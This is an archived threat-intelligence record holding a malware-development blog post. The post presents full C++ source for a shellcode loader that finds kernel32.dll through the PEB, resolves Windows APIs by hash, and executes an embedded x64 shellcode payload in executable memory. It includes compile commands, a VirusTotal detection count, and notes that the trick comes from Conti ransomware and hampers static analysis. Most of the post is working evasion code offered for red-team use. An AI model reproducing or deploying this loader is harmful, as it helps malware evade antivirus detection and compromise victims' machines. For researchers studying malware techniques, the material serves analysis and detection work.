{
	"id": "13d7cff9-99d9-4f1b-bb2a-7cae527feb70",
	"created_at": "2026-04-06T01:31:09.096688Z",
	"updated_at": "2026-04-10T03:20:23.371377Z",
	"deleted_at": null,
	"sha1_hash": "b697d911e75ad3682a936ec7b6a45284c5d34989",
	"title": "Malware development tricks. Find kernel32.dll base: asm style. C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1558414,
	"plain_text": "Malware development tricks. Find kernel32.dll base: asm style. C++\r\nexample.\r\nBy cocomelonc\r\nPublished: 2022-04-02 · Archived: 2026-04-06 00:48:11 UTC\r\n5 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the result of my self research into interesting trick in real-life malware.\r\nIn the one of my previous posts I wrote about using GetModuleHandle . It is returns a handle a specified DLL. For\r\nexample:\r\n#include \u003cwindows.h\u003e\r\nLPVOID (WINAPI * pVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);\r\n//...\r\nhttps://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\nPage 1 of 11\n\nint main() {\r\n DWORD oldprotect = 0;\r\n HMODULE hk32 = GetModuleHandle(\"kernel32.dll\");\r\n pVirtualAlloc = GetProcAddress(hk32, \"VirtualAlloc\");\r\n //...\r\n return 0;\r\n}\r\nThen, the actual way to execute shellcode is something like this ( meow.cpp ):\r\n#include \u003cwindows.h\u003e\r\nLPVOID (WINAPI * pVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);\r\nunsigned char my_payload[] 
=\r\n\"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n\"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n\"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n\"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n\"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n\"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n\"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n\"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n\"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n\"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n\"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n\"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n\"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n\"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n\"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n\"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n\"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n\"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n\"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n\"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n\"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n\"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nint main() {\r\n HMODULE hk32 = GetModuleHandle(\"kernel32.dll\");\r\n pVirtualAlloc = GetProcAddress(hk32, \"VirtualAlloc\");\r\n PVOID lb = pVirtualAlloc(0, sizeof(my_payload), MEM_COMMIT | MEM_RESERVE, 
PAGE_READWRITE);\r\n memcpy(lb, my_payload, sizeof(my_payload));\r\n HANDLE th = CreateThread(0, 0, (PTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);\r\n WaitForSingleObject(th, -1);\r\n}\r\nSo this code contains very basic logic for executing a payload. In this case, for simplicity, it uses a “meow-meow”\r\nmessagebox payload.\r\nLet’s compile it:\r\nx86_64-w64-mingw32-g++ meow.cpp -o meow.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata\r\nand run:\r\nWe used the GetModuleHandle function to locate kernel32.dll in memory. It’s possible to avoid this call by finding\r\nthe library location in the PEB.\r\nassembly way :)\r\nIn one of my previous posts I wrote about the TEB and PEB structures and found kernel32 via asm. The\r\nfollowing was obtained:\r\n1. offset to the PEB struct is 0x030\r\n2. offset to LDR within PEB is 0x00c\r\n3. offset to InMemoryOrderModuleList is 0x014\r\n4. 1st loaded module is our .exe\r\n5. 2nd loaded module is ntdll.dll\r\n6. 3rd loaded module is kernel32.dll\r\n7. 4th loaded module is kernelbase.dll\r\nToday I will consider the x64 architecture. The offsets are different:\r\n1. PEB address is located at an address relative to GS register: GS:[0x60]\r\n2. offset to LDR within PEB is 0x18\r\n3. 
kernel32.dll base address at 0x10\r\npractical example\r\nSo:\r\nstatic HMODULE getKernel32(DWORD myHash) {\r\n HMODULE kernel32;\r\n INT_PTR peb = __readgsqword(0x60);\r\n auto modList = 0x18;\r\n auto modListFlink = 0x18;\r\n auto kernelBaseAddr = 0x10;\r\n auto mdllist = *(INT_PTR*)(peb + modList);\r\n auto mlink = *(INT_PTR*)(mdllist + modListFlink);\r\n auto krnbase = *(INT_PTR*)(mlink + kernelBaseAddr);\r\n auto mdl = (LDR_MODULE*)mlink;\r\n do {\r\n mdl = (LDR_MODULE*)mdl-\u003ee[0].Flink;\r\n if (mdl-\u003ebase != nullptr) {\r\n if (calcMyHashBase(mdl) == myHash) { // kernel32.dll hash\r\n break;\r\n }\r\n }\r\n } while (mlink != (INT_PTR)mdl);\r\n kernel32 = (HMODULE)mdl-\u003ebase;\r\n return kernel32;\r\n}\r\nThen, to find GetProcAddress and GetModuleHandle, I used the getAPIAddr function from my earlier post:\r\nstatic LPVOID getAPIAddr(HMODULE h, DWORD myHash) {\r\n PIMAGE_DOS_HEADER img_dos_header = (PIMAGE_DOS_HEADER)h;\r\n PIMAGE_NT_HEADERS img_nt_header = (PIMAGE_NT_HEADERS)((LPBYTE)h + img_dos_header-\u003ee_lfanew);\r\n PIMAGE_EXPORT_DIRECTORY img_edt = (PIMAGE_EXPORT_DIRECTORY)(\r\n (LPBYTE)h + img_nt_header-\u003eOptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);\r\n PDWORD fAddr = (PDWORD)((LPBYTE)h + img_edt-\u003eAddressOfFunctions);\r\n PDWORD fNames = (PDWORD)((LPBYTE)h + img_edt-\u003eAddressOfNames);\r\n PWORD fOrd = (PWORD)((LPBYTE)h + img_edt-\u003eAddressOfNameOrdinals);\r\n for (DWORD i = 0; i \u003c img_edt-\u003eNumberOfNames; i++) {\r\n LPSTR pFuncName = (LPSTR)((LPBYTE)h + fNames[i]);\r\n if (calcMyHash(pFuncName) == myHash) {\r\n printf(\"successfully found! 
%s - %d\\n\", pFuncName, myHash);\r\n return (LPVOID)((LPBYTE)h + fAddr[fOrd[i]]);\r\n }\r\n }\r\n return nullptr;\r\n}\r\nAccordingly, the main() function logic is different:\r\nint main() {\r\n HMODULE mod = getKernel32(56369259);\r\n fnGetModuleHandleA myGetModuleHandleA = (fnGetModuleHandleA)getAPIAddr(mod, 4038080516);\r\n fnGetProcAddress myGetProcAddress = (fnGetProcAddress)getAPIAddr(mod, 448915681);\r\n HMODULE hk32 = myGetModuleHandleA(\"kernel32.dll\");\r\n fnVirtualAlloc myVirtualAlloc = (fnVirtualAlloc)myGetProcAddress(hk32, \"VirtualAlloc\");\r\n fnCreateThread myCreateThread = (fnCreateThread)myGetProcAddress(hk32, \"CreateThread\");\r\n fnWaitForSingleObject myWaitForSingleObject = (fnWaitForSingleObject)myGetProcAddress(hk32, \"WaitForSingleObject\");\r\n PVOID lb = myVirtualAlloc(0, sizeof(my_payload), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n memcpy(lb, my_payload, sizeof(my_payload));\r\n HANDLE th = myCreateThread(NULL, 0, (PTHREAD_START_ROUTINE)lb, NULL, 0, NULL);\r\n myWaitForSingleObject(th, INFINITE);\r\n}\r\nAs you can see, I used the Win32 API call-by-hash trick.\r\nThe full source code ( hack.cpp ) is:\r\n/*\r\n * hack.cpp - find kernel32 from PEB, assembly style. 
C++ implementation\r\n * @cocomelonc\r\n * https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\ntypedef struct _UNICODE_STRING {\r\n USHORT Length;\r\n USHORT MaximumLength;\r\n PWSTR Buffer;\r\n} UNICODE_STRING;\r\nstruct LDR_MODULE {\r\n LIST_ENTRY e[3];\r\n HMODULE base;\r\n void* entry;\r\n UINT size;\r\n UNICODE_STRING dllPath;\r\n UNICODE_STRING dllname;\r\n};\r\ntypedef HMODULE(WINAPI *fnGetModuleHandleA)(\r\n LPCSTR lpModuleName\r\n);\r\ntypedef FARPROC(WINAPI *fnGetProcAddress)(\r\n HMODULE hModule,\r\n LPCSTR lpProcName\r\n);\r\ntypedef PVOID(WINAPI *fnVirtualAlloc)(\r\n LPVOID lpAddress,\r\n SIZE_T dwSize,\r\n DWORD flAllocationType,\r\n DWORD flProtect\r\n);\r\ntypedef PVOID(WINAPI *fnCreateThread)(\r\n LPSECURITY_ATTRIBUTES lpThreadAttributes,\r\n SIZE_T dwStackSize,\r\n LPTHREAD_START_ROUTINE lpStartAddress,\r\n LPVOID lpParameter,\r\n DWORD dwCreationFlags,\r\n LPDWORD lpThreadId\r\n);\r\ntypedef PVOID(WINAPI *fnWaitForSingleObject)(\r\n HANDLE hHandle,\r\n DWORD dwMilliseconds\r\n);\r\nDWORD calcMyHash(char* data) {\r\n DWORD hash = 0x35;\r\n for (int i = 0; i \u003c strlen(data); i++) {\r\n hash += data[i] + (hash \u003c\u003c 1);\r\n }\r\n return hash;\r\n}\r\nstatic DWORD calcMyHashBase(LDR_MODULE* mdll) {\r\n char name[64];\r\n size_t i = 0;\r\n while (mdll-\u003edllname.Buffer[i] \u0026\u0026 i \u003c sizeof(name) - 1) {\r\n name[i] = (char)mdll-\u003edllname.Buffer[i];\r\n i++;\r\n }\r\n name[i] = 0;\r\n return calcMyHash((char *)CharLowerA(name));\r\n}\r\nstatic HMODULE getKernel32(DWORD myHash) {\r\n HMODULE kernel32;\r\n INT_PTR peb = __readgsqword(0x60);\r\n auto modList = 0x18;\r\n auto modListFlink = 0x18;\r\n auto kernelBaseAddr = 0x10;\r\n auto mdllist = 
*(INT_PTR*)(peb + modList);\r\n auto mlink = *(INT_PTR*)(mdllist + modListFlink);\r\n auto krnbase = *(INT_PTR*)(mlink + kernelBaseAddr);\r\n auto mdl = (LDR_MODULE*)mlink;\r\n do {\r\n mdl = (LDR_MODULE*)mdl-\u003ee[0].Flink;\r\n if (mdl-\u003ebase != nullptr) {\r\n if (calcMyHashBase(mdl) == myHash) { // kernel32.dll hash\r\n break;\r\n }\r\n }\r\n } while (mlink != (INT_PTR)mdl);\r\n kernel32 = (HMODULE)mdl-\u003ebase;\r\n return kernel32;\r\n}\r\nstatic LPVOID getAPIAddr(HMODULE h, DWORD myHash) {\r\n PIMAGE_DOS_HEADER img_dos_header = (PIMAGE_DOS_HEADER)h;\r\n PIMAGE_NT_HEADERS img_nt_header = (PIMAGE_NT_HEADERS)((LPBYTE)h + img_dos_header-\u003ee_lfanew);\r\n PIMAGE_EXPORT_DIRECTORY img_edt = (PIMAGE_EXPORT_DIRECTORY)(\r\n (LPBYTE)h + img_nt_header-\u003eOptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);\r\n PDWORD fAddr = (PDWORD)((LPBYTE)h + img_edt-\u003eAddressOfFunctions);\r\n PDWORD fNames = (PDWORD)((LPBYTE)h + img_edt-\u003eAddressOfNames);\r\n PWORD fOrd = (PWORD)((LPBYTE)h + img_edt-\u003eAddressOfNameOrdinals);\r\n for (DWORD i = 0; i \u003c img_edt-\u003eNumberOfNames; i++) {\r\n LPSTR pFuncName = (LPSTR)((LPBYTE)h + fNames[i]);\r\n if (calcMyHash(pFuncName) == myHash) {\r\n printf(\"successfully found! 
%s - %d\\n\", pFuncName, myHash);\r\n return (LPVOID)((LPBYTE)h + fAddr[fOrd[i]]);\r\n }\r\n }\r\n return nullptr;\r\n}\r\nunsigned char my_payload[] =\r\n\"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n\"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n\"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n\"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n\"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n\"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n\"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n\"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n\"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n\"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n\"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n\"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n\"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n\"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n\"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n\"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n\"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n\"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n\"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n\"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n\"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n\"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nint main() {\r\n HMODULE mod = getKernel32(56369259);\r\n fnGetModuleHandleA 
myGetModuleHandleA = (fnGetModuleHandleA)getAPIAddr(mod, 4038080516);\r\n fnGetProcAddress myGetProcAddress = (fnGetProcAddress)getAPIAddr(mod, 448915681);\r\n HMODULE hk32 = myGetModuleHandleA(\"kernel32.dll\");\r\n fnVirtualAlloc myVirtualAlloc = (fnVirtualAlloc)myGetProcAddress(hk32, \"VirtualAlloc\");\r\n fnCreateThread myCreateThread = (fnCreateThread)myGetProcAddress(hk32, \"CreateThread\");\r\n fnWaitForSingleObject myWaitForSingleObject = (fnWaitForSingleObject)myGetProcAddress(hk32, \"WaitForSingleObject\");\r\n PVOID lb = myVirtualAlloc(0, sizeof(my_payload), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n memcpy(lb, my_payload, sizeof(my_payload));\r\n HANDLE th = myCreateThread(NULL, 0, (PTHREAD_START_ROUTINE)lb, NULL, 0, NULL);\r\n myWaitForSingleObject(th, INFINITE);\r\n}\r\nAs you can see, I used the same hash algorithm.\r\ndemo\r\nLet’s compile it:\r\nx86_64-w64-mingw32-g++ hack.cpp -o hack.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata\r\nand run (on the victim’s Windows 10 x64 machine):\r\n.\\hack.exe\r\nAs you can see, everything worked perfectly :)\r\nLet’s upload it to VirusTotal:\r\nhttps://www.virustotal.com/gui/file/0f5204336b3250fe2756b0a675013099be58f99a522e3e14161c1709275ec2d5/detection\r\nSo 6 of 69 AV engines detect our file as malicious.\r\nThese tricks can be used to make the static analysis of our malware slightly harder, mainly focusing on PE format and\r\ncommon indicators.\r\nI saw this trick in the source code of Conti ransomware.\r\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red\r\nteamers’ arsenal.\r\nPEB structure\r\nTEB 
structure\r\nPEB_LDR_DATA structure\r\nGetModuleHandleA\r\nGetProcAddress\r\nwindows shellcoding - part 1\r\nwindows shellcoding - find kernel32\r\nConti ransomware source code\r\nsource code in GitHub\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and goodbye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html"
	],
	"report_names": [
		"malware-injection-18.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775439069,
	"ts_updated_at": 1775791223,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b697d911e75ad3682a936ec7b6a45284c5d34989.pdf",
		"text": "https://archive.orkl.eu/b697d911e75ad3682a936ec7b6a45284c5d34989.txt",
		"img": "https://archive.orkl.eu/b697d911e75ad3682a936ec7b6a45284c5d34989.jpg"
	}
}